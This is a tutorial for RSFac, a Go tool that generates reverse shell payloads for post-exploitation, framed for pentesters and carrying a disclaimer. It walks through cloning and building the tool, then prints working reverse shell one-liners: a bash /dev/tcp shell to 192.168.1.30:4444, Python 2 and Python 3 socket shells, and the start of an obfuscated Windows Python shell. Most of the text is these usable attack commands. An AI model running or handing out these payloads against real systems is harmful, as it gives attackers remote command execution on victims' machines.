The use of the Reverse shell fectory.
Date: 15/11/2021
Do not use this for malicious purposes.
RSFac (Reverse Shell Factory) is a tool written in Golang which aims to make reverse shell creation easier.
The use of reverse shell is something very common because of the ease that these simple codes give to have control over a machine during the post exploitation.
The tool has several possibilities to enable the creation of the reverse shell that best suits the pentester scenario.
Basically speaking, reverse shells are codes that when executed on a machine, an attacker an attacker who has a server waiting, receives a connection through which he can execute commands and receive responses from the target machine. The tool becomes necessary when it is needed to quickly create a malicious code to be used inside the target system during the post exploitation. When there are blocks, it is necessary to test others Reverse Shell written in different programming languages, RSFactory automates the process having several options that can be used.
The RSFactory tool was initially written in the Python programming language and later translated to Golang, so that it could become more adaptive and simple to use on any system, since only the portable binary is needed.
The tool source code should be downloaded to the computer where it will be used from the repository on github.
git clone https://github.com/farinap5/rsfac.git
Now it is just to compile the single binary and start using.
go build rsfac.go
sudo mv rsfac /usr/bin/
rsfac -h
The tool has several usage options but there are those which are necessary in almost all the cases. To access the help menu use the argument:
rsfac -h
There are some settings that will be essential for the creation of the payload. the IP of the host machine that will be waiting for the reverse connection coming from the target machine and the port which will be listening for the connection over the TCP protocol in this case.
Command | Description |
---|---|
-host | Local Host |
-port | Listening Port |
Unless the chosen payload is to be interpreted by a web application, it must contain a host and a port.
rsfac -host 192.168.1.30 -port 4444 -p bash
The output would be:
bash -c 'exec bash -i &>/dev/tcp/192.168.1.30/4444 <&1'
But when we want to create in a language like python that there are more than one version, it is possible to generate a code in the language version that the target system is compatible.
Command | Description |
---|---|
-v | Payload version. |
rsfac -p py
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0
.0.0",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/
sh","-i"]);'
Applying required version:
rsfac -p py -v py3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.
0.0.0",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bi
n/sh","-i"]);'
Perhaps the system that is receiving the pentest is a Windows, deviating a little from the conventional it is possible to generate reverse shell for Windows.
Command | Description |
---|---|
-os | Operating system |
This way we can be choosing operating system for which the reverse shell will be generated. If the target operating system is based on a Kernel Linux, the option does not need to be specified, since the tool creates codes for Kernel Linux by default.
rsfac -p py -os windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('0.0.0.0', 6666)),....